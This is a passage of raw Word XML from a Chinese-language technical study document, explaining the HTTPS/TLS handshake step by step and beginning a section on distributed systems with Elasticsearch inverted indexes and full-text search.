      </w:r>
      <w:r w:rsidR="007B662F" w:rsidRPr="007B662F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所研发，用以保障在</w:t>
      </w:r>
      <w:r w:rsidR="007B662F" w:rsidRPr="007B662F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Internet</w:t>
      </w:r>
      <w:r w:rsidR="007B662F" w:rsidRPr="007B662F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上数据传输的安全，利用数据加密</w:t>
      </w:r>
      <w:r w:rsidR="007B662F" w:rsidRPr="007B662F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(Encryption)</w:t>
      </w:r>
      <w:r w:rsidR="007B662F" w:rsidRPr="007B662F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的技术，可确保数据在网络上的传输过程中不会被截取及窃听。</w:t>
      </w:r>
      <w:r w:rsidR="007B662F" w:rsidRPr="007B662F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SSL</w:t>
      </w:r>
      <w:r w:rsidR="007B662F" w:rsidRPr="007B662F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>协议位于</w:t>
      </w:r>
      <w:r w:rsidR="007B662F" w:rsidRPr="007B662F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>TCP/IP</w:t>
      </w:r>
      <w:r w:rsidR="007B662F" w:rsidRPr="007B662F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>协议与各种应用层协议之间，为数据通讯提供安全支持。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0002691C" w:rsidRPr="0002691C" w:rsidRDefault="005F6AA9" w:rsidP="0002691C">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTPS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>两次握手过程</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0002691C" w:rsidRDefault="0002691C" w:rsidP="0002691C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>HTTPS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其实是有两部分组成：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP + SSL / TLS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，也就是在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上又加了一层处理加密信息的模块。服务端和客户端的信息传输都会通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>TLS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行加密，所以传输的数据都是加密后的数据。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0002691C" w:rsidRDefault="0002691C" w:rsidP="0002691C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>HTTPS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在传输数据之前需要客户端（浏览器）与服务端（网站）之间进行一次握手，在握手过程中将确立双方加密传输数据的密码信息。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>TLS/SSL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>协议不仅仅是一套加密传输的协议，更是一件经过艺术家精心设计的艺术品，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>TLS/SSL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中使用了非对称加密，对称加密以及</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HASH</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>算法。握手过程的具体描述如下：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="ab"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8522"/>
      </w:tblGrid>
      <w:tr w:rsidR="0002691C" w:rsidTr="0002691C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0002691C" w:rsidRDefault="00E05F81" w:rsidP="0002691C">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidR="0002691C">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>1.</w:t>
            </w:r>
            <w:r w:rsidR="0002691C">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>浏览器将自己支持的一套</w:t>
            </w:r>
            <w:r w:rsidR="0002691C" w:rsidRPr="00C66BD3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>加密规则</w:t>
            </w:r>
            <w:r w:rsidR="0002691C">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>发送给网站。</w:t>
            </w:r>
            <w:r w:rsidR="0002691C">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0002691C" w:rsidRDefault="0002691C" w:rsidP="0002691C">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:tab/>
              <w:t>2.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>网站从中选出一组加密算法与</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>HASH</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>算法，并将自己的身份信息以证书的形式发回给浏览器。证书里面包含了网站地址，加密公钥，以及证书的颁发机构等信息。</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0002691C" w:rsidRDefault="0002691C" w:rsidP="0002691C">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:tab/>
              <w:t>3.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>浏览器获得网站证书之后浏览器要做以下工作：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0002691C" w:rsidRDefault="0002691C" w:rsidP="0002691C">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve">a) </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>验证证书的合法性（颁发证书的机构是否合法，证书中包含的网站地址是否与正在访问的地址一致等），如果证书受信任，则浏览器栏里面会显示一个小锁头，否则会给出证书不受信的提示。</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0002691C" w:rsidRDefault="0002691C" w:rsidP="0002691C">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve">b) </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>如果证书受信任，或者是用户接受了不受信的证书，浏览器会生成一串随机数的密码，并用证书中提供的公钥加密。</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0002691C" w:rsidRDefault="0002691C" w:rsidP="0002691C">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve">c) </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>使用约定好的</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>HASH</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>算法计算握手消息，并使用生成的随机数对消息进行加密，最后将之前生成的所有信息发送给网站。</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0002691C" w:rsidRDefault="0002691C" w:rsidP="0002691C">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:tab/>
              <w:t>4.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>网站接收浏览器发来的数据之后要做以下的操作：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0002691C" w:rsidRDefault="0002691C" w:rsidP="0002691C">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve">a) </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>使用自己的私钥将信息解密取出密码，使用密码解密浏览器发来的握手消息，并验证</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>HASH</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>是否与浏览器发来的一致。</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0002691C" w:rsidRDefault="0002691C" w:rsidP="0002691C">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:tab/>
              <w:t xml:space="preserve">b) </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>使用密码加密一段握手消息，发送给浏览器。</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0002691C" w:rsidRPr="0002691C" w:rsidRDefault="0002691C" w:rsidP="0002691C">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:tab/>
              <w:t>5.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>浏览器解密并计算握手消息的</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>HASH</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，如果与服务端发来的</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>HASH</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>一致，此时握手过程结束，之后所有的通信数据将由之前浏览器生成的</w:t>
            </w:r>
            <w:r w:rsidRPr="00631FBF">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>随机密码并利用对称加密算法</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>进行加密。</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0002691C" w:rsidRPr="0002691C" w:rsidRDefault="0002691C" w:rsidP="0002691C"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0002691C" w:rsidRDefault="0002691C" w:rsidP="0002691C"/>
    <w:p w:rsidR="0002691C" w:rsidRPr="0002691C" w:rsidRDefault="0002691C" w:rsidP="0002691C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="004701A1" w:rsidRDefault="004701A1" w:rsidP="004701A1">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="241" w:lineRule="atLeast"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4055110" cy="4397375"/>
            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
            <wp:docPr id="271" name="图片 17" descr="http://static.oschina.net/uploads/img/201511/06144655_S6y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tatic.oschina.net/uploads/img/201511/06144655_S6yK.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId282" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4055110" cy="4397375"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004701A1" w:rsidRPr="00AD43C0" w:rsidRDefault="004701A1" w:rsidP="004701A1">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="241" w:lineRule="atLeast"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="4560539"/>
            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
            <wp:docPr id="270" name="图片 14" descr="http://static.oschina.net/uploads/img/201511/06144655_tp2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tatic.oschina.net/uploads/img/201511/06144655_tp2v.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId283" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="4560539"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B592B" w:rsidRPr="00F41A4C" w:rsidRDefault="006E559F" w:rsidP="005B592B">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="00B90D09" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005B592B" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>分布式</w:t>
      </w:r>
      <w:r w:rsidR="00FA6D7F" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>与集群</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A959CB" w:rsidRPr="00F41A4C" w:rsidRDefault="00A959CB" w:rsidP="00387E98">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A368BE" w:rsidRPr="00F41A4C" w:rsidRDefault="002B77AB" w:rsidP="00A368BE">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="00A368BE" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">.1 </w:t>
      </w:r>
      <w:r w:rsidR="00A368BE" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>搜索引擎</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C22321" w:rsidRDefault="00C5450C" w:rsidP="00C22321">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidRPr="00C22BC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>lasticsearch</w:t>
      </w:r>
      <w:r w:rsidRPr="00C22BC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>使用一种叫做</w:t>
      </w:r>
      <w:r w:rsidRPr="00C22BC8">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>倒排索引</w:t>
      </w:r>
      <w:r w:rsidRPr="00C22BC8">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(inverted index)</w:t>
      </w:r>
      <w:r w:rsidRPr="00C22BC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>的结构来做快速的全文搜索。倒排索引由在文档中出现的唯一的单词列表，以及对于每个单词在文档中的位置组成。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C22321" w:rsidRDefault="00C22321" w:rsidP="00C22321">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0089789D" w:rsidRPr="00C22BC8" w:rsidRDefault="00DA54D7" w:rsidP="00C22321">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId284" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidR="0089789D" w:rsidRPr="00C22BC8">
          <w:rPr>
            <w:rFonts w:eastAsia="宋体"/>
            <w:color w:val="333333"/>
            <w:kern w:val="0"/>
            <w:sz w:val="19"/>
            <w:szCs w:val="19"/>
          </w:rPr>
          <w:t>全文检索</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="0089789D" w:rsidRPr="00C22BC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>是指计算机索引程序通过扫描文章中的每一个词，对每一个词建立一个索引，指明该词在文章中出现的次数和位置，当用户查询时，检索程序就根据事先建立的索引进行查找，并将查找的结果反馈给用户的检索方式。这个过程类似于通过字典中的检索字表查字的过程。全文搜索搜索引擎数据库中的数据。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00537A59" w:rsidRPr="00C22BC8" w:rsidRDefault="00537A59" w:rsidP="004B4B2E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C22BC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>让我们尝试一种更高级的搜索，全文搜索</w:t>
      </w:r>
      <w:r w:rsidRPr="00C22BC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>——</w:t>
      </w:r>
      <w:r w:rsidRPr="00C22BC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
